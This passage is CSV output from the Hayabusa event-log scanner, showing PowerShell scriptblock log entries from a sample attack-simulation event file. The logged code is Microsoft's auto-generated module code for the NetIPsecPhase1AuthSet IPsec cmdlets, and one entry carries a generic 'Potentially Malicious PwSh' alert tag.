$__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecPhase1AuthSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${Default}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { 
([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 
'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 
$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Default')) { [object]$__cmdletization_value = ${Default} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecPhase1AuthSet' -Alias '*' function Get-NetIPsecPhase1AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, 
Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { 
$__cmdletization_exc",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.514 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIKEP1AuthSet' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecPhase1AuthSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, 
[Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${Default}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 
'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) 
[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Default')) { [object]$__cmdletization_value = ${Default} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null 
$__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecPhase1AuthSet' -Alias '*' function Get-NetIPsecPhase1AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', 
Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exc",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.514 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"eptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) 
$__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') 